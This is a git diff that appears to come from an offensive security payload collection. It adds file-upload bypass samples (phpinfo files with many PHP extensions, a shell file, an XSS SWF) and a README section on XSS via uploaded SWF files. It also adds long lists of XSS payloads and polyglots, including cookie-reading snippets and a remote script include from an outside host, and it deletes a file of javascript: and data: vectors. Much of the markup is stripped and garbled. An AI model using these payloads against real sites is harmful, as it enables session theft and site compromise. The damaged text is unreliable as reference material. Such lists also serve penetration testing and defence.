+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/Upload insecure files/Insecure Flash/xssproject.swf b/Upload insecure files/Insecure Flash/xssproject.swf new file mode 100644 index 0000000..a0e7b36 Binary files /dev/null and b/Upload insecure files/Insecure Flash/xssproject.swf differ diff --git a/Upload insecure files/Metadata GIF/phpinfo-metadata.gif b/Upload insecure files/Metadata GIF/phpinfo-metadata.gif new file mode 100644 index 0000000..67f5d45 Binary files /dev/null and b/Upload insecure files/Metadata GIF/phpinfo-metadata.gif differ diff --git a/Upload insecure files/Metadata PNG/phpinfo-metadata.jpg b/Upload insecure files/Metadata PNG/phpinfo-metadata.jpg new file mode 100644 index 0000000..580cf6f Binary files /dev/null and b/Upload insecure files/Metadata PNG/phpinfo-metadata.jpg differ diff --git a/Upload insecure files/PHP Extension/Shell.phpt b/Upload insecure files/PHP Extension/Shell.phpt new file mode 100755 index 0000000..b1abb37 --- /dev/null +++ b/Upload insecure files/PHP Extension/Shell.phpt @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/Upload insecure files/PHP Extension/phpinfo.jpg.php b/Upload insecure files/PHP Extension/phpinfo.jpg.php new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.jpg.php @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php b/Upload insecure files/PHP Extension/phpinfo.php new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php3 b/Upload insecure files/PHP Extension/phpinfo.php3 new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php3 @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php4 b/Upload insecure files/PHP Extension/phpinfo.php4 new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php4 @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php5 b/Upload insecure files/PHP Extension/phpinfo.php5 new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php5 @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php7 b/Upload insecure files/PHP Extension/phpinfo.php7 new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php7 @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.phpt b/Upload insecure files/PHP Extension/phpinfo.phpt new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.phpt @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.pht b/Upload insecure files/PHP Extension/phpinfo.pht new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.pht @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.phtml b/Upload insecure files/PHP Extension/phpinfo.phtml new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.phtml @@ -0,0 +1 @@ + diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md index 83dbb45..7a8b7d1 100644 --- a/Upload insecure files/README.md +++ b/Upload insecure files/README.md @@ -1,5 +1,5 @@ # Upload -Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. +Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. ## Exploits Image Tragik @@ -36,5 +36,20 @@ JPG Bypass a resize - Upload the picture and use a local file inclusion http://localhost/test.php?c=ls ``` +XSS via SWF +``` +As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. + +This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. + +Examples: + +Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); + +IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} + +IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); +``` + ## Thanks to -* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil \ No newline at end of file +* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil diff --git a/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt b/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt new file mode 100644 index 0000000..59dedcd --- /dev/null +++ b/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt @@ -0,0 +1,17 @@ +alert`1` +alert(1) +alert(1) +alert(1) +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top['al\x65rt'](1) +top[8680439..toString(30)](1) +navigator.vibrate(500) +eval(URL.slice(-8))>#alert(1) +eval(location.hash.slice(1)>#alert(1) +innerHTML=location.hash># diff --git a/XSS injection/BRUTELOGIC-XSS-STRINGS.txt b/XSS injection/BRUTELOGIC-XSS-STRINGS.txt new file mode 100644 index 0000000..5ea07a0 --- /dev/null +++ b/XSS injection/BRUTELOGIC-XSS-STRINGS.txt @@ -0,0 +1,113 @@ + +"> +lose focus! +click this! +copy this! +right click this! +copy this! +double click this! +drag this! +focus this! +input here! +press any key! +press any key! +press any key! +click this! +hover this! +hover this! +hover this! +click this! +paste here! + + + + + + + + + +<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); + + + + + + + + + + + + + + + # + # +MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);# +# +%23 + + + + + + + +# +#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); + + +#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); + + +? +"> +
//["'`-->]]>]
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]
&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]
0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
X//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]






...



//["'`-->]]>]
01//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
X//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
¼script ¾alert(19)//¼/script ¾//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
1//["'`-->]]>]
;1//["'`-->]]>]
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]
//["'`-->]]>]
+
1//["'`-->]]>]
+
]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
XXXXXX//["'`-->]]>]
1//["'`-->]]>]
1//["'`-->]]>]
XXX//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
+
+ + + +><image xlink:href="//["'`-->]]>]
+
//["'`-->]]>]
+
  • +
    //["'`-->]]>]
    +
    XXX//["'`-->]]>]
    +
    + + + + +Hello +//["'`-->]]>]
    +
    X//["'`-->]]>]
    XXX
    //["'`-->]]>]
    XXX
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    +//["'`-->]]>]
    +
    //["'`-->]]>]
    //["'`-->]]>]
    alert(57)//0//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    XXX
    //["'`-->]]>]
    +
    XXX
    //["'`-->]]>]
    + +
    + + + + +//["'`-->]]>]
    + +
    // O10.10↓, OM10.0↓, GC6↓, FF + + // IE6, O10.10↓, OM10.0↓ + // IE6, O11.01↓, OM10.1↓//["'`-->]]>]
    +
    ]>&x;//["'`-->]]>]
    //["'`-->]]>]
    +
    + +//["'`-->]]>]
    + +
    +]>//["'`-->]]>]
    + +
    + XXX +//["'`-->]]>]
    +
    //["'`-->]]>]
    x
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    &x;//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    //["'`-->]]>]
    +
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    + +//["'`-->]]>]
    + +
    + + + + + + + + + +//["'`-->]]>]
    + +
    + + +//["'`-->]]>]
    + +
    +
    + + + + +
    PRESS ENTER
    //["'`-->]]>]
    + +
    [A] +"> +"> +"> +[B] +"> +[C] + +[D] +<% foo>//["'`-->]]>]
    +
    X
    //["'`-->]]>]
    X
    //["'`-->]]>]
    +
    +alert(94) +//["'`-->]]>]
    + +
    + + + +//["'`-->]]>]
    + +
    +//["'`-->]]>]
    + +
    +
    + + + +
    +//["'`-->]]>]
    + +
    X
    +//["'`-->]]>]
    + +
    XXX//["'`-->]]>]
    +
    //["'`-->]]>]
    XXX//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    + +//["'`-->]]>]
    +
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    +`><img src=xx:x onerror=alert(108)></a> + + +`><img src=xx:x onerror=alert(2)// +`><img src=xx:x onerror=alert(3)////["'`-->]]>]
    + +
    + + +//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    +
    X
    //["'`-->]]>]
    X
    //["'`-->]]>]
    +
    XXX
    +//["'`-->]]>]
    +
    XXX//["'`-->]]>]
    +
    +//["'`-->]]>]
    + +
    x
    + + +//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    + +
    +

    Drop me

    +
    + +//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    + +
    + + +Spam//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    +
    Some text +www.example.org + + +//["'`-->]]>]
    + +
    // Safari 5.0, Chrome 9, 10 + // Safari 5.0//["'`-->]]>]
    + +
    + +]> + + + + + + + +//["'`-->]]>]
    + +
    +//["'`-->]]>]
    + +
    + +alert(127) +//["'`-->]]>]
    +
    +
    + + +//["'`-->]]>]
    + +
    CLICKME + + + +CLICKME + + +CLICKMEhttp://http://google.com +//["'`-->]]>]
    + +
    drag and drop one of the following strings to the drop box: +
    +jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// +
    +feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// +
    +feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b> +
    +feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// +
    +
    + Drop Box +
    //["'`-->]]>]
    + +
    + + +
    + + + + + + + + + +//["'`-->]]>]
    +
    //["'`-->]]>]
    +
    +<% + +%></xmp><img src=xx:x onerror=alert(134)// + + %>/ +alert(2) + + +XXX + +-->{} +*{color:red}//["'`-->]]>]
    + +
    + + +//["'`-->]]>]
    + +
    + + + + +
    //["'`-->]]>]
    + +
    + + + +//["'`-->]]>]
    +
    //["'`-->]]>]
    + + +
    +
    +
    + + + +exp/* + + + + + +getURL("javascript:alert('XSS')") +a="get"; + + + +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- + + + + +PT SRC="http://ha.ckers.org/xss.js"> diff --git a/XSS injection/Wrapper JS and Data XSS.md b/XSS injection/Wrapper JS and Data XSS.md deleted file mode 100644 index 4e7e3c7..0000000 --- a/XSS injection/Wrapper JS and Data XSS.md +++ /dev/null @@ -1,13 +0,0 @@ -XSS with javascript: -``` -javascript:prompt(1) - -%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 - -javascript:confirm(1) -``` - -XSS with data: -``` -data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ -``` \ No newline at end of file diff --git a/XSS injection/XSS_Polyglots.txt b/XSS injection/XSS_Polyglots.txt new file mode 100644 index 0000000..21d6f97 --- /dev/null +++ b/XSS injection/XSS_Polyglots.txt @@ -0,0 +1,14 @@ +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> +“ onclick=alert(1)//